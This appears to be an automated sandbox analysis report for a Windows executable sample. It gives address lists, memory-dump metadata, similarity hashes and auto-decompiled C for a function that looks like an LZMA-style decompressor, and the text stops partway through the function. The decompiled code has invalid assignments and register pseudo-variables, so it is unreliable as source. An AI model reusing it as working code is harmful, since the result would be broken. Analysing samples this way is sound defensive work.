                                          0x00406bc8
                                          0x00406be6
                                          0x00406be9
                                          0x00406bf0
                                          0x00406bf3
                                          0x00406bf6
                                          0x00406bf9
                                          0x00406bfc
                                          0x00406bff
                                          0x00406c01
                                          0x00406c08
                                          0x00406c09
                                          0x00406c0b
                                          0x00406c0e
                                          0x00406c11
                                          0x00406c14
                                          0x00406c14
                                          0x00406c19
                                          0x00000000
                                          0x00406c19
                                          0x00406bca
                                          0x00406bcd
                                          0x00406bd0
                                          0x00406bda
                                          0x00000000
                                          0x00000000
                                          0x00406c2e
                                          0x00406c32
                                          0x00406c55
                                          0x00406c58
                                          0x00406c5b
                                          0x00406c65
                                          0x00406c34
                                          0x00406c34
                                          0x00406c37
                                          0x00406c3a
                                          0x00406c3d
                                          0x00406c4a
                                          0x00406c4d
                                          0x00406c4d
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406ce2
                                          0x00406ce6
                                          0x00406ced
                                          0x00406cf0
                                          0x00406cf3
                                          0x00406cfd
                                          0x00000000
                                          0x00406cfd
                                          0x00406ce8
                                          0x00000000
                                          0x00000000
                                          0x00406d09
                                          0x00406d0d
                                          0x00406d14
                                          0x00406d17
                                          0x00406d1a
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d0f
                                          0x00406d1d
                                          0x00406d20
                                          0x00406d23
                                          0x00406d23
                                          0x00406d26
                                          0x00406d29
                                          0x00000000
                                          0x00000000
                                          0x00406dc9
                                          0x00406dc9
                                          0x00406dcd
                                          0x0040716b
                                          0x00000000
                                          0x0040716b
                                          0x00406dd3
                                          0x00406dd6
                                          0x00406dd9
                                          0x00406ddd
                                          0x00406de0
                                          0x00406de6
                                          0x00406de8
                                          0x00406de8
                                          0x00406de8
                                          0x00406deb
                                          0x00406dee
                                          0x00000000
                                          0x00000000
                                          0x004069be
                                          0x004069be
                                          0x004069c2
                                          0x0040712f
                                          0x00000000
                                          0x0040712f
                                          0x004069c8
                                          0x004069cb
                                          0x004069ce
                                          0x004069d2
                                          0x004069d5
                                          0x004069db
                                          0x004069dd
                                          0x004069dd
                                          0x004069dd
                                          0x004069e0
                                          0x004069e3
                                          0x004069e3
                                          0x004069e6
                                          0x004069e9
                                          0x00000000
                                          0x00000000
                                          0x004069ef
                                          0x004069f5
                                          0x00000000
                                          0x00000000
                                          0x004069fb
                                          0x004069fb
                                          0x004069ff
                                          0x00406a02
                                          0x00406a05
                                          0x00406a08
                                          0x00406a0b
                                          0x00406a0c
                                          0x00406a0f
                                          0x00406a11
                                          0x00406a17
                                          0x00406a1a
                                          0x00406a1d
                                          0x00406a20
                                          0x00406a23
                                          0x00406a26
                                          0x00406a29
                                          0x00406a45
                                          0x00406a48
                                          0x00406a4b
                                          0x00406a4e
                                          0x00406a55
                                          0x00406a59
                                          0x00406a5b
                                          0x00406a5f
                                          0x00406a2b
                                          0x00406a2b
                                          0x00406a2f
                                          0x00406a37
                                          0x00406a3c
                                          0x00406a3e
                                          0x00406a40
                                          0x00406a40
                                          0x00406a62
                                          0x00406a69
                                          0x00406a6c
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a72
                                          0x00000000
                                          0x00406a77
                                          0x00406a77
                                          0x00406a7b
                                          0x0040713b
                                          0x00000000
                                          0x0040713b
                                          0x00406a81
                                          0x00406a84
                                          0x00406a87
                                          0x00406a8b
                                          0x00406a8e
                                          0x00406a94
                                          0x00406a96
                                          0x00406a96
                                          0x00406a96
                                          0x00406a99
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406a9c
                                          0x00406aa2
                                          0x00000000
                                          0x00000000
                                          0x00406aa4
                                          0x00406aa7
                                          0x00406aaa
                                          0x00406aad
                                          0x00406ab0
                                          0x00406ab3
                                          0x00406ab6
                                          0x00406ab9
                                          0x00406abc
                                          0x00406abf
                                          0x00406ac2
                                          0x00406ada
                                          0x00406add
                                          0x00406ae0
                                          0x00406ae3
                                          0x00406ae3
                                          0x00406ae6
                                          0x00406aea
                                          0x00406aec
                                          0x00406ac4
                                          0x00406ac4
                                          0x00406acc
                                          0x00406ad1
                                          0x00406ad3
                                          0x00406ad5
                                          0x00406ad5
                                          0x00406aef
                                          0x00406af6
                                          0x00406af9
                                          0x00000000
                                          0x00406afb
                                          0x00000000
                                          0x00406afb
                                          0x00406af9
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00406b00
                                          0x00000000
                                          0x00000000
                                          0x00406b3b
                                          0x00406b3b
                                          0x00406b3f
                                          0x00407147
                                          0x00000000
                                          0x00407147
                                          0x00406b45
                                          0x00406b48
                                          0x00406b4b
                                          0x00406b4f
                                          0x00406b52
                                          0x00406b58
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5a
                                          0x00406b5d
                                          0x00406b60
                                          0x00406b60
                                          0x00406b66
                                          0x00406b04
                                          0x00406b04
                                          0x00406b07
                                          0x00000000
                                          0x00406b07
                                          0x00406b68
                                          0x00406b68
                                          0x00406b6b
                                          0x00406b6e
                                          0x00406b71
                                          0x00406b74
                                          0x00406b77
                                          0x00406b7a
                                          0x00406b7d
                                          0x00406b80
                                          0x00406b83
                                          0x00406b86
                                          0x00406b9e
                                          0x00406ba1
                                          0x00406ba4
                                          0x00406ba7
                                          0x00406ba7
                                          0x00406baa
                                          0x00406bae
                                          0x00406bb0
                                          0x00406b88
                                          0x00406b88
                                          0x00406b90
                                          0x00406b95
                                          0x00406b97
                                          0x00406b99
                                          0x00406b99
                                          0x00406bb3
                                          0x00406bba
                                          0x00406bbd
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406bbf
                                          0x00000000
                                          0x00406e4c
                                          0x00406e4c
                                          0x00406e50
                                          0x00407177
                                          0x00000000
                                          0x00407177
                                          0x00406e56
                                          0x00406e59
                                          0x00406e5c
                                          0x00406e60
                                          0x00406e63
                                          0x00406e69
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6b
                                          0x00406e6e
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f5b
                                          0x00406f5f
                                          0x00406f81
                                          0x00406f84
                                          0x00406f8e
                                          0x00000000
                                          0x00406f8e
                                          0x00406f61
                                          0x00406f64
                                          0x00406f68
                                          0x00406f6b
                                          0x00406f6b
                                          0x00406f6e
                                          0x00000000
                                          0x00000000
                                          0x00407018
                                          0x0040701c
                                          0x0040703a
                                          0x0040703a
                                          0x0040703a
                                          0x00407041
                                          0x00407048
                                          0x0040704f
                                          0x0040704f
                                          0x00000000
                                          0x0040704f
                                          0x0040701e
                                          0x00407021
                                          0x00407024
                                          0x00407027
                                          0x0040702e
                                          0x00406f72
                                          0x00406f72
                                          0x00406f75
                                          0x00000000
                                          0x00000000
                                          0x00407109
                                          0x0040710c
                                          0x00000000
                                          0x00000000
                                          0x00406d43
                                          0x00406d45
                                          0x00406d4c
                                          0x00406d4d
                                          0x00406d4f
                                          0x00406d52
                                          0x00000000
                                          0x00000000
                                          0x00406d5a
                                          0x00406d5d
                                          0x00406d60
                                          0x00406d62
                                          0x00406d64
                                          0x00406d64
                                          0x00406d65
                                          0x00406d68
                                          0x00406d6f
                                          0x00406d72
                                          0x00406d80
                                          0x00000000
                                          0x00000000
                                          0x00407056
                                          0x00407056
                                          0x00407059
                                          0x00407060
                                          0x00000000
                                          0x00000000
                                          0x00407065
                                          0x00407065
                                          0x00407069
                                          0x004071a1
                                          0x00000000
                                          0x004071a1
                                          0x0040706f
                                          0x00407072
                                          0x00407075
                                          0x00407079
                                          0x0040707c
                                          0x00407082
                                          0x00407084
                                          0x00407084
                                          0x00407084
                                          0x00407087
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708a
                                          0x0040708d
                                          0x0040708d
                                          0x00407091
                                          0x004070f1
                                          0x004070f4
                                          0x004070f9
                                          0x004070fa
                                          0x004070fc
                                          0x004070fe
                                          0x00407101
                                          0x00000000
                                          0x00407101
                                          0x00407093
                                          0x00407099
                                          0x0040709c
                                          0x0040709f
                                          0x004070a2
                                          0x004070a5
                                          0x004070a8
                                          0x004070ab
                                          0x004070ae
                                          0x004070b1
                                          0x004070b4
                                          0x004070cd
                                          0x004070d0
                                          0x004070d3
                                          0x004070d6
                                          0x004070da
                                          0x004070dc
                                          0x004070dc
                                          0x004070dd
                                          0x004070e0
                                          0x004070b6
                                          0x004070b6
                                          0x004070be
                                          0x004070c3
                                          0x004070c5
                                          0x004070c8
                                          0x004070c8
                                          0x004070e3
                                          0x004070ea
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x004070ec
                                          0x00000000
                                          0x00406d88
                                          0x00406d8b
                                          0x00406dc1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef1
                                          0x00406ef4
                                          0x00406ef4
                                          0x00406ef7
                                          0x00406ef9
                                          0x00407183
                                          0x00000000
                                          0x00407183
                                          0x00406eff
                                          0x00406f02
                                          0x00000000
                                          0x00000000
                                          0x00406f08
                                          0x00406f0c
                                          0x00406f0f
                                          0x00406f0f
                                          0x00406f0f
                                          0x00000000
                                          0x00406f0f
                                          0x00406d8d
                                          0x00406d8f
                                          0x00406d91
                                          0x00406d93
                                          0x00406d96
                                          0x00406d97
                                          0x00406d99
                                          0x00406d9b
                                          0x00406d9e
                                          0x00406da1
                                          0x00406db7
                                          0x00406dbc
                                          0x00406df4
                                          0x00406df4
                                          0x00406df8
                                          0x00406e24
                                          0x00406e26
                                          0x00406e2d
                                          0x00406e30
                                          0x00406e33
                                          0x00406e33
                                          0x00406e38
                                          0x00406e38
                                          0x00406e3a
                                          0x00406e3d
                                          0x00406e44
                                          0x00406e47
                                          0x00406e74
                                          0x00406e74
                                          0x00406e77
                                          0x00406e7a
                                          0x00406eee
                                          0x00406eee
                                          0x00406eee
                                          0x00000000
                                          0x00406eee
                                          0x00406e7c
                                          0x00406e82
                                          0x00406e85
                                          0x00406e88
                                          0x00406e8b
                                          0x00406e8e
                                          0x00406e91
                                          0x00406e94
                                          0x00406e97
                                          0x00406e9a
                                          0x00406e9d
                                          0x00406eb6
                                          0x00406eb8
                                          0x00406ebb
                                          0x00406ebc
                                          0x00406ebf
                                          0x00406ec1
                                          0x00406ec4
                                          0x00406ec6
                                          0x00406ec8
                                          0x00406ecb
                                          0x00406ecd
                                          0x00406ed0
                                          0x00406ed4
                                          0x00406ed6
                                          0x00406ed6
                                          0x00406ed7
                                          0x00406eda
                                          0x00406edd
                                          0x00406e9f
                                          0x00406e9f
                                          0x00406ea7
                                          0x00406eac
                                          0x00406eae
                                          0x00406eb1
                                          0x00406eb1
                                          0x00406ee0
                                          0x00406ee7
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00406e71
                                          0x00000000
                                          0x00406ee9
                                          0x00000000
                                          0x00406ee9
                                          0x00406ee7
                                          0x00406dfa
                                          0x00406dfd
                                          0x00406dff
                                          0x00406e02
                                          0x00406e05
                                          0x00406e08
                                          0x00406e0a
                                          0x00406e0d
                                          0x00406e10
                                          0x00406e10
                                          0x00406e13
                                          0x00406e13
                                          0x00406e16
                                          0x00406e1d
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00406df1
                                          0x00000000
                                          0x00406e1f
                                          0x00000000
                                          0x00406e1f
                                          0x00406e1d
                                          0x00406da3
                                          0x00406da6
                                          0x00406da8
                                          0x00406dab
                                          0x00000000
                                          0x00000000
                                          0x00406b0a
                                          0x00406b0a
                                          0x00406b0e
                                          0x00407153
                                          0x00000000
                                          0x00407153
                                          0x00406b14
                                          0x00406b17
                                          0x00406b1a
                                          0x00406b1d
                                          0x00406b20
                                          0x00406b23
                                          0x00406b26
                                          0x00406b28
                                          0x00406b2b
                                          0x00406b2e
                                          0x00406b31
                                          0x00406b33
                                          0x00406b33
                                          0x00406b33
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00000000
                                          0x00406f12
                                          0x00406f12
                                          0x00406f12
                                          0x00406f16
                                          0x00000000
                                          0x00000000
                                          0x00406f1c
                                          0x00406f1f
                                          0x00406f22
                                          0x00406f25
                                          0x00406f27
                                          0x00406f27
                                          0x00406f27
                                          0x00406f2a
                                          0x00406f2d
                                          0x00406f30
                                          0x00406f33
                                          0x00406f36
                                          0x00406f39
                                          0x00406f3a
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3c
                                          0x00406f3f
                                          0x00406f42
                                          0x00406f45
                                          0x00406f48
                                          0x00406f4b
                                          0x00406f4f
                                          0x00406f51
                                          0x00406f54
                                          0x00000000
                                          0x00406f56
                                          0x00000000
                                          0x00406f56
                                          0x00406f54
                                          0x00407189
                                          0x00000000
                                          0x00000000
                                          0x004067b8

                                          Memory Dump Source
                                          • Source File: 00000001.00000002.656113568.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000001.00000002.656098530.0000000000400000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656133616.0000000000408000.00000002.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656142531.000000000040A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656152726.0000000000413000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656167614.0000000000422000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656175020.000000000042A000.00000004.00020000.sdmp Download File
                                          • Associated: 00000001.00000002.656182728.000000000042D000.00000002.00020000.sdmp Download File
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                          • Instruction ID: 7a557209975026f945a3d96698a9d3e809275b90a73cce2131b371529b247a98
                                          • Opcode Fuzzy Hash: b03ad86bf6e5db825a161e7c2c9863a2c6e055a2fa0602cea3b48f6a3cf4a0c0
                                          • Instruction Fuzzy Hash: 0F813471D04228CFDF24CFA8C884BADBBB1FB44305F25816AD456BB281C778A996DF45
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406776, Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 98%
                                          			E00406776(void* __ecx) {
				void* _v8;
				void* _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v95;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				intOrPtr _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				void _v140;
				void* _v148;
				signed int _t537;
				signed int _t538;
				signed int _t572;

				_t572 = 0x22;
				_v148 = __ecx;
				memcpy( &_v140, __ecx, _t572 << 2);
				if(_v52 == 0xffffffff) {
					return 1;
				}
				while(1) {
					L3:
					_t537 = _v140;
					if(_t537 > 0x1c) {
						break;
					}
					switch( *((intOrPtr*)(_t537 * 4 +  &M004071C8))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8);
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12);
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
